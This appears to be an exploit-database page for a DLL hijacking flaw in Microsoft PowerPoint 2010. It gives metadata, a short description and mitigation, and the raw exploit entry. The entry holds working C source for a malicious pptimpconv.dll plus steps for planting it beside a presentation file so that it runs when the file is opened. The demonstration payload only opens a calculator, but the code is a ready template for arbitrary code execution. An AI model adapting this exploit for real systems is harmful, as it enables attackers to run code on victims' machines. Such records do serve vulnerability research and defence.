header-logo
Suggest Exploit
vendor:
PowerPoint
by:
TheLeader
9,3
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: PowerPoint
Affected Version From: 14.0.4760.1000
Affected Version To: 14.0.4760.1000
Patch Exists: NO
Related CWE: N/A
CPE: a:microsoft:powerpoint:14.0.4760.1000
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x86 (6.1.7600)
2010

Microsoft PowerPoint 2010 DLL Hijacking Exploit (pptimpconv.dll)

This exploit allows an attacker to execute arbitrary code by placing a malicious DLL in the same directory as a vulnerable Microsoft PowerPoint 2010 file. The malicious DLL must be named pptimpconv.dll and the vulnerable file must have one of the following extensions: .odp / .pot / .potm / .potx / .ppa / .pps / .ppsm / .ppsx / .ppt / .pptm / .pptx / .pwz / .sldm / .sldx. When the vulnerable file is opened, the malicious DLL will be executed, allowing the attacker to run arbitrary code.

Mitigation:

Ensure that all vulnerable files are stored in a secure location and that only trusted users have access to them. Additionally, ensure that all vulnerable files are scanned for malicious code before being opened.
Source

Exploit-DB raw data:

/*
Exploit Title: Microsoft PowerPoint 2010 DLL Hijacking Exploit (pptimpconv.dll)
Date: 24/08/2010
Author: TheLeader
Email: gsog2009 [a7] hotmail [d0t] com
Software Link: http://office.microsoft.com/en-us/powerpoint/
Version: 14.0.4760.1000
Tested on: Windows 7 x86 (6.1.7600)

Compile and rename to pptimpconv.dll, create a file in the same dir with one of the following extensions:
.odp / .pot / .potm / .potx / .ppa / .pps / .ppsm / .ppsx / .ppt / .pptm / .pptx / .pwz / .sldm / .sldx

This exploit does _not_ get triggered with the following file extensions:
.pothtml / .ppam / .ppthtml / .pptxml / .thmx

Double click & watch a nice calculator pop =]
*More shouts* to all the great guys at forums.hacking.org.il
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void HrCreateConverter() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}